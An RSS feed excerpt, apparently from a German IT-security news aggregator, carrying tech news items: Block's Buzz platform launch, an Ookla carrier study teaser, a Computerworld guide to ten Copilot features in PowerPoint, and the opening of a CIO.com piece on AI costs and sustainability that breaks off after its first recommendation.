<content:encoded><![CDATA[Jack Dorsey's Block has launched Buzz, an open-source workplace collaboration platform that combines messaging, project management, and software development workflows for teams of both humans and AI agents. Dorsey described Buzz as "a new groupchat platform for teams of people and agents of all sizes" that is "model-agnostic, decentralized, self-sovereign and open source." SmartCompany reports: According to the Buzz website, users can invite specialized AI agents into team chats, allowing them to collaborate with employees and even other AI agents. From there, they can reportedly move directly from discussions into planning, coding, pull requests and project management without switching between multiple applications.
 
Buzz also aims to replace parts of GitHub by bringing software development workflows directly into the platform. Teams can plan work, write code, review pull requests and manage Git projects without jumping between separate collaboration and development tools. [...] In practice, that means businesses aren't locked into a single AI provider. Organisations can self-host Buzz, customize it to suit their own workflows and choose whichever AI models best fit their needs.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Jack+Dorsey+Takes+On+Slack+and+GitHub+With+New+AI+Workplace+Platform+'Buzz'%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F22%2F040209%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F22%2F040209%2Fjack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/22/040209/jack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[T-Mobile, Verizon or AT&T? New study reveals best mobile carrier - ranks internet providers, too]]></title>
<description><![CDATA[Read this before switching your cell or internet service: Ookla's latest study measures speed, performance, and consistency among US telecom providers.]]></description>
<link>https://tsecurity.de/de/3686699/hacking/t-mobile-verizon-or-att-new-study-reveals-best-mobile-carrier-ranks-internet-providers-too/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686699/hacking/t-mobile-verizon-or-att-new-study-reveals-best-mobile-carrier-ranks-internet-providers-too/</guid>
<pubDate>Wed, 22 Jul 2026 16:40:24 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Read this before switching your cell or internet service: Ookla's latest study measures speed, performance, and consistency among US telecom providers.]]></content:encoded>
</item>
<item>
<title><![CDATA[10 cool things Copilot can do in PowerPoint]]></title>
<description><![CDATA[Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are vis...]]></description>
<link>https://tsecurity.de/de/3686068/it-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686068/it-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</guid>
<pubDate>Wed, 22 Jul 2026 13:05:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are visually appealing.</p>



<p class="wp-block-paragraph">In PowerPoint, Microsoft’s Copilot AI assistant can now automate the heavy lifting of presentation creation. It can generate a first-draft presentation in minutes, then help you edit it. You can also prompt Copilot to help you quickly understand the contents of a presentation and glean insights from it. Use the tips in this guide to save oodles of time as you create and work with presentations.</p>



<h3 class="wp-block-heading">Who can use Copilot in PowerPoint</h3>



<p class="wp-block-paragraph">Individuals with a <a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/individuals" target="_blank" rel="noreferrer noopener">Microsoft 365 Personal, Family, or Premium</a> subscription have access to Copilot from within PowerPoint and other Microsoft 365 apps. Users with a Premium plan have <a href="https://support.microsoft.com/en-US/Microsoft-365-Copilot/ai-credits-and-limits-for-microsoft-365-subscriptions" target="_blank" rel="noreferrer noopener">higher Copilot usage allowances</a> and access to advanced AI features.</p>



<p class="wp-block-paragraph">For business users, it’s more complicated. Organizations with more than 2,000 users must pay for <a href="https://www.computerworld.com/article/1629974/m365-copilot-microsofts-generative-ai-tool-explained.html">Microsoft 365 Copilot</a> licenses for their users in addition to their regular Microsoft 365 licenses. Users at organizations with fewer than 2,000 users can use Copilot within M365 apps even without the M365 Copilot add-on licenses, but there are <a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">limitations</a> in usage, speed, and feature availability.</p>



<p class="wp-block-paragraph">To see what kind of access you have, log in to Microsoft’s <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat web hub</a> and look for your name in the lower left corner. If you see “M365 Copilot (Premium)” under your name, you can use Copilot in M365 apps with priority access and advanced features. “M365 Copilot (Basic)” means you can use Copilot in M365 apps with lower-priority access and limited features. If you see “Copilot Chat (Basic)” or nothing below your name, you can’t use Copilot in M365 apps.</p>



<p class="wp-block-paragraph"><em>(Copilot Chat Basic users do get some Copilot functionality, including the ability to generate presentations, via the Copilot Chat hub. See our <a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat tutorial</a> for details.)</em></p>



<h4 class="wp-block-heading"><strong>In this article:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#sidebar">Working with Copilot in PowerPoint</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#template">Create a presentation template</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#pres-from-doc">Create a presentation from a document</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#slide-from-doc">Add content from a document to a slide</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#refine-text">Refine your slide text</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#image">Find or create an image</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#expand">Expand your presentation with relevant slides</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#summarize">Summarize a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#answer-questions">Answer questions about a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#navigate">Help you navigate a large presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#speaker-notes">Generate speaker notes and/or an FAQ</a></li>
</ul>



<h2 class="wp-block-heading">Working with Copilot in PowerPoint</h2>



<p class="wp-block-paragraph">First, let’s quickly go over the notable settings of the Copilot sidebar.</p>



<p class="wp-block-paragraph">When you have a presentation open in PowerPoint, click the Copilot icon; it may be floating at the lower-right corner of your PowerPoint window or parked at the right end of the Ribbon toolbar. The Copilot sidebar will open along the right of the page. You’ll type your prompts to Copilot inside the chat window in this pane.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-01-sidebar.png?w=1024" alt="powerpoint screen with copilot sidebar open on right" class="wp-image-4195065" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The sidebar on the right is where you interact with Copilot in PowerPOint.</p><br></figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph"><strong>Agent mode:</strong> By default, Copilot can build a new presentation or make changes to an existing one in the main PowerPoint window. This is known as “agent mode.” To change this so that Copilot can’t take direct action on a presentation (all its responses appear in the sidebar), click the <em>Allow editing</em> button above the chat window and change it to <em>Chat only</em>.</p>



<p class="wp-block-paragraph">The tips in this guide require that Copilot be in agent mode, so make sure you see <em>Allow editing</em> above the chat window.</p>



<p class="wp-block-paragraph"><strong>Choice of AI model:</strong> Behind the scenes, Copilot has access to various genAI models, including different versions of Anthropic Claude and OpenAI GPT.  By default, it decides which model to use based on your prompt. You can set it to use a particular model: click <em>Auto</em> at the upper right of the Copilot pane and select a model from the dropdown that opens.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-02-sidebar-model-dropdown.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with models dropdown menu open" class="wp-image-4195063" width="1024" height="697" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>You can choose which AI model you want Copilot to use for a request.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">The tips in this guide should work fine on the default <em>Auto</em> setting. But feel free to experiment switching to specific models to see which give you the best results for particular tasks.</p>



<p class="wp-block-paragraph"><strong>Important:</strong> Remember that <a href="https://www.computerworld.com/article/4059383/openai-admits-ai-hallucinations-are-mathematically-inevitable-not-just-engineering-flaws.html">generative AI output often includes errors</a>, so always check Copilot’s output for accuracy. (Also see our <a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">tips for reducing hallucinations in Copilot</a>.) You’ll likely want to rewrite it in your own voice as you’re reviewing it.</p>



<h2 class="wp-block-heading"><a></a>1. Create a presentation template</h2>



<p class="wp-block-paragraph">For many people, the hardest part of creating a presentation is getting started. What types of information should be included on the slides, and in what order? Copilot can give you a leg up by creating the type of presentation you need, with placeholder data that you can later replace with your own.</p>



<p class="wp-block-paragraph">Start a new presentation, open the Copilot sidebar, and type your prompt into the chat window. It’s best to provide very specific details in your prompt. The more context or details you provide, the more likely Copilot will generate a presentation template that suits your needs.</p>



<p class="wp-block-paragraph">A good prompt should contain the slide count, subject, audience, and tone. Example:</p>



<ul class="wp-block-list">
<li><em>Create a 6-slide presentation for a sales meeting focusing on Q1 revenue. The audience is the sales team, so keep the tone professional and focused on the sales data.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot may ask a series of follow-up questions, such as your preferred visual style and desired level of detail. Then it will generate a presentation template.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-03-generated-presentation-with-placeholder-data.png?w=1024" alt="screenshot of powerpoint presentation generated by copilot with placeholder data" class="wp-image-4195064" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot generates a presentation with placeholder data and explains its elements.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">You can optionally prompt Copilot for revisions, and when you’re happy with the template, swap in your own data.</p>



<h2 class="wp-block-heading"><a></a>2. Create a presentation from a document</h2>



<p class="wp-block-paragraph">You can attach a document (such as a Word document, Excel spreadsheet, or PDF) and prompt Copilot to generate a presentation based on its contents. This works best with a structured-format document (such as a business plan, project proposal, or summary report) that contains sections with headings.</p>



<p class="wp-block-paragraph">Copilot can extract the document’s text and structure to generate the slide content for the new presentation. This can especially be useful for quickly turning a long report into a visually appealing presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, click the <em>+</em> icon at the bottom of the chat window. A list of documents that you’ve recently accessed appears. Select the one that you want Copilot to use. Alternatively, click the magnifying glass icon and inside its search box, type a few letters of the filename for the document you want. (Business users with an M365 Copilot license can select up to five files for Copilot to pull from when creating a presentation.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-04-attach-document.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with a document being attached for copilot to base a presentation on" class="wp-image-4195062" width="1024" height="733" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Attaching a document for Copilot to base a presentation on.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Then in the chat window, you can enter a prompt that’s as simple as “<em>Create a presentation</em>,” although as always, providing more details and context is better. This is especially important for corporate users who reference multiple source files. It’s useful to tell Copilot what data to pull from each document.</p>



<p class="wp-block-paragraph">Answer any follow-up questions that Copilot asks, and it will then generate the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-05-generated-presentation-from-doc.png?w=1024" alt="screenshot of powerpoint with a presentation generated by copilot from a document" class="wp-image-4195067" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot has generated a professional presentation from a social media marketing campaign document.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note: Your marketing department may have created one or more <a href="https://support.microsoft.com/en-US/PowerPoint/copilot/keep-your-presentation-on-brand-with-copilot" target="_blank" rel="noreferrer noopener">branded company templates for Copilot to work from</a>. If that’s the case at your organization, simply open the appropriate company template as your first step. Then you can upload docs and type a prompt as described above. Copilot will create a presentation using the branded template.</p>



<h2 class="wp-block-heading"><a></a>3. Add content from a document to a slide</h2>



<p class="wp-block-paragraph">Manually copying text or other content from a document and pasting it into a new slide is a chore. Instead, you can prompt Copilot to extract information directly from a Word document, Excel spreadsheet, or PDF to create new slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, attach the document using the same steps described in tip 2, then tell Copilot to create a slide from the document. As always, it helps to provide details such as the new slide’s focus or what data to include:</p>



<ul class="wp-block-list">
<li><em>Add a slide based on the attached document.</em></li>



<li><em>Use the attached file to add a slide about the project budget that focuses on Q1 projections.</em></li>



<li><em>Summarize only the financial section of the attached document as a slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-06-generated-slide-from-spreadsheet.png?w=1024" alt="screenshot of a slide in powerpoint generated by copilot from spreadsheet data" class="wp-image-4195068" width="1024" height="612" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A new Copilot-generated slide based on data from an Excel spreadsheet.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a><a></a>4. Refine your slide text</h2>



<p class="wp-block-paragraph">A presentation should be visual and display only the core message. Conciseness and proper writing tone are essential for your slides, so that they don’t lose the attention of your audience.</p>



<p class="wp-block-paragraph">You can prompt Copilot to refine text on an individual slide in various ways, such as rewriting it in a more professional tone or making it more concise. Highlight the text inside a text box on the slide. On the toolbar that appears over the highlighted text, click <em>Edit with Copilot</em>.</p>



<p class="wp-block-paragraph">On the menu that opens, you can select a preset prompt to refine the text, such as <em>Condense</em> or <em>Make professional</em>. Or, at the top of this menu, you can type a prompt to rewrite the highlighted text.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-07-refine-slide-text-options-menu.png" alt="screenshot of text on a powerpoint slide with copilot dropdown menu includng condense and make professional options" class="wp-image-4195066" width="960" height="690" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="wp-element-caption"><p>Choose a preset prompt for refining text on a slide or type in your own prompt.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note that this feature affects all the text inside the text box. To rewrite only a portion of text inside a text box, you must split that portion out into a separate text box.</p>



<p class="wp-block-paragraph">Alternatively, you can prompt Copilot to analyze your entire presentation and tighten up the wording throughout all of its slides. For example:</p>



<ul class="wp-block-list">
<li><em>Make these slides more visual and use less text.</em></li>
</ul>



<h2 class="wp-block-heading">5. Find or create an image</h2>



<p class="wp-block-paragraph">If you have Copilot generate a presentation from an existing Word document that contains images, it will incorporate those images into the presentation. If there are no images in the source document, you can ask Copilot to find or create one and add it to a slide.</p>



<p class="wp-block-paragraph">To add a stock image or an image from your organization’s brand library, tell Copilot what you’re looking for:</p>



<ul class="wp-block-list">
<li><em>Add a stock photo of young adults in a cafe drinking boba tea.</em></li>



<li><em>Add a photo from our asset library of young adults in a cafe drinking boba tea.</em></li>
</ul>



<p class="wp-block-paragraph">To have Copilot create an image using Microsoft’s Designer image generation tool, describe your desired image. As always, specificity is helpful:</p>



<ul class="wp-block-list">
<li><em>Create a photorealistic image of a diverse group of 5 or 6 fashionable young adults sitting in a cafe drinking boba tea. They’re smiling or laughing, and some are looking at their phones.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-08-generate-image.png?w=1024" alt="screenshot of image generation prompt in copilot sidebar in powerpoint plus the resulting generated image on a slide" class="wp-image-4195097" width="1024" height="594" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot in PowerPoint hooks into Microsoft’s Designer tool for image generation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Just as you need to review any text output from Copilot, take a close look at generated images to be sure nothing looks off. </p>



<p class="wp-block-paragraph">Also note that Copilot image generation isn’t always reliable in PowerPoint. For some time during our testing for this story, Copilot said it couldn’t create an image because “the image generation service is returning a server error on every attempt.” After about a day and a half, the service began working again.</p>



<h2 class="wp-block-heading"><a></a>6. Expand your presentation with relevant slides</h2>



<p class="wp-block-paragraph">As you’re building your presentation, you may find that it’s become text heavy. Or perhaps it could use more visually oriented slides to break things up and make its progression flow better. Copilot can generate and insert new slides that are based on the content of the slides already in the presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, specify exactly where you want the new slide to go. This helps Copilot to analyze the content of the slides before and after where you want the new slide. Then it can generate a slide to bridge between the two slides. Examples:</p>



<ul class="wp-block-list">
<li><em>Add a slide after slide 3 about our competitive advantages.</em></li>



<li><em>Add a slide after slide 11 that transitions to slide 12.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-09-generated-transition-slide.png?w=1024" alt="screenshot of powerpoint screen with copilot sidebar and a transition slide generated by copilot" class="wp-image-4195094" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Need a transition slide? Just ask!</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading">7. Summarize a presentation</h2>



<p class="wp-block-paragraph">Maybe you need a quick refresh of your presentation before an important meeting. Or maybe a co-worker has sent you a presentation that’s packed with lots of slides. You can prompt Copilot to generate a summary of the presentation’s overall messaging.</p>



<p class="wp-block-paragraph">In the Copilot pane, just type “<em>summarize this presentation</em>.” You can also have Copilot flag key slides that contain important information: “<em>show me key slides</em>.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-10-summarize-key-slides.png?w=1024" alt="screenshots of copilot sidebar in powerpoint - one with summarize results and one with key slides response" class="wp-image-4195095" width="1024" height="774" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot to summarize a presentation or flag key slides.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>8. Answer questions about a presentation</h2>



<p class="wp-block-paragraph">As you’re reviewing a presentation, especially one that you didn’t create and are not familiar with, you can get Copilot to pull key data points from its slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, type specific informational questions. Examples:</p>



<ul class="wp-block-list">
<li><em>What are the action items in this deck?</em></li>



<li><em>What is the proposed budget mentioned here?</em></li>
</ul>



<p class="wp-block-paragraph">If Copilot can’t find the exact answer to the question you ask, it will provide related information from the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-11-ask-questions-about-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response to query about proposed budget in the slide deck" class="wp-image-4195093" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot specific questions about the contents of a presentation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">This method can also help you validate that your presentation includes everything you want it to. If you ask Copilot about the action items in a presentation and it can’t find any, you know you need to add them. (Copilot will likely offer to generate them for you based on the rest of the slides.)</p>



<p class="wp-block-paragraph">You can even take this tactic a step further and ask Copilot if the presentation is missing any important data, if any slides are weak or confusing, if there are any awkward transitions, if there are key points that should be better emphasized, and so on.</p>



<h2 class="wp-block-heading"><a></a>9. Help you navigate a large presentation</h2>



<p class="wp-block-paragraph">In the business world, presentations with dozens of slides are not uncommon, such as for financial reports or project documentation. Trying to find a specific slide or multiple slides can be tough. Copilot can help you navigate such a presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, prompt Copilot to find slides based on specific topics. Example:</p>



<ul class="wp-block-list">
<li><em>Show me the slides about the project timeline.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will analyze the presentation and reply with a list of links to the relevant slides. Click one of these to jump directly to that slide.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-12-navigate-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response about the slide that talks about target audience" class="wp-image-4195096" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can help you zoom directly to a slide that covers a particular topic or shows specific data.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>10. Generate speaker notes and/or an FAQ</h2>



<p class="wp-block-paragraph">Here’s a great timesaver when you’re preparing to show your presentation to an audience: Copilot can automatically generate suggested speaker notes for you, based on the content of your slides. Example prompt:</p>



<ul class="wp-block-list">
<li><em>Write speaker notes for every slide with one talking point per slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-13-speaker-notes.png?w=1024" alt="screenshot of powerpoint presentation with speaker notes generated by copilot" class="wp-image-4195092" width="1024" height="607" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can create speaker notes in seconds.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">In a related feature, Copilot can create a frequently asked questions list (FAQ) for you to consult in your speaker notes or to present as a slide:</p>



<ul class="wp-block-list">
<li><em>Write an FAQ for these slides.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will ask where you want the questions and answers added — as a new slide at the end, integrated into the speaker notes of relevant slides, or somewhere else that you designate. Make a selection, and Copilot will generate the FAQ based on the content of your presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-14-generated-faq-slide.png?w=1024" alt="screenshot of frequently asked questions slide generated by copilot in powerpoint" class="wp-image-4195091" width="1024" height="609" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A Copilot-generated FAQ slide.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h4 class="wp-block-heading"><strong>Related reading:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/1647230/powerpoint-for-microsoft-365-cheat-sheet.html">PowerPoint for Microsoft 365 cheat sheet</a></li>



<li><a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat: Your hub for document creation and analysis</a></li>



<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/1682358/microsoft-cheat-sheets-dive-into-windows-and-office-apps.html">More Microsoft tips and tutorials</a></li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[4 recs for CIOs to optimize AI budgets and improve sustainability]]></title>
<description><![CDATA[In the client-server era, the penalty for inefficient programming, such as unoptimized database calls, was largely confined to application responsiveness. Today, in the AI era, code, architectural, and platform inefficiencies are no longer just a performance issue, they’re a financial and environ...]]></description>
<link>https://tsecurity.de/de/3685758/it-security-nachrichten/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685758/it-security-nachrichten/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability/</guid>
<pubDate>Wed, 22 Jul 2026 11:11:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In the client-server era, the penalty for inefficient programming, such as unoptimized database calls, was largely confined to application responsiveness. Today, in the AI era, code, architectural, and platform inefficiencies are no longer just a performance issue, they’re a financial and environmental liability. Left unchecked, poor code cascades into soaring token costs and spikes data center power consumption, directly undermining both cloud budgets and corporate sustainability goals.</p>



<h2 class="wp-block-heading">AI’s impact on sustainability</h2>



<p class="wp-block-paragraph">By 2029, IDC projects that the number of actively deployed AI agents will exceed 1 billion worldwide, which is 40 times more than in 2025. And these agents will perform 217 billion actions per day.</p>



<p class="wp-block-paragraph">To deliver on this demand, AI data centers are being built out at an unprecedented rate, with Gartner forecasting that <a href="https://www.gartner.com/en/newsroom/press-releases/2026-02-03-gartner-forecasts-worldwide-it-spending-to-grow-10-point-8-percent-in-2026-totaling-6-point-15-trillion-dollars">global spending on data centers</a> over the next three years will increase 31.7% to surpass $650 billion, driven primarily by hyperscaler cloud providers building out AI foundations, and optimizing servers for heavy AI workloads.</p>



<p class="wp-block-paragraph">All this presents a significant strain on the energy grid as well as environmental sustainability, including:</p>



<ul class="wp-block-list">
<li><strong>The power double-down:</strong> The <a href="https://energy.ec.europa.eu/news/focus-data-centres-energy-hungry-challenge-2025-11-17_en">International Energy Agency</a> (IEA) projects that global data center electricity consumption will more than double from about 415 to 945 TWh by 2030, primarily fueled by energy-intensive accelerated computing for AI.</li>



<li><strong>The inference premium:</strong> AI workloads are vastly more demanding than standard web activities. A gen AI query consumes roughly <a href="https://www.brookings.edu/articles/global-energy-demands-within-the-ai-regulatory-landscape/">10 times the electricity</a> of a conventional keyword search, or roughly 2.9 watt-hours as opposed to 0.3 watt-hours.</li>



<li><strong>Water consumption:</strong> Cooling these dense clusters is highly resource intensive. Global AI-related water demand is expected to reach <a href="https://aimultiple.com/ai-energy-consumption">4.2 to 6.6 billion cubic meters by 2027</a>.</li>
</ul>



<p class="wp-block-paragraph">The good news, however, is it’s not all out of the control of end user organizations and CIOs. Just as in the client-server era, through careful planning and execution, CIOs have the potential to significantly improve the performance, costs, and sustainability impacts of their AI application portfolio.</p>



<p class="wp-block-paragraph">Here are four recommendations to maximize value as you look across your AI applications and infrastructure estate.</p>



<h2 class="wp-block-heading">Revisit business objectives in light of AI</h2>



<p class="wp-block-paragraph">AI applications and platforms bring several new headaches for CIOs and CFOs in terms of FinOps. The variable nature of <a href="https://www.cio.com/article/4169954/servicenows-ai-control-tower-offers-hazy-view-of-spend.html">AI vendor billing due to variable monthly token costs</a> is just one well-known example. To avoid unpleasant surprises, be sure to carefully review vendor contracts to decipher pricing models. Look for what’s included in seat-based license fees and what’s added as variable charges for agentic AI usage.</p>



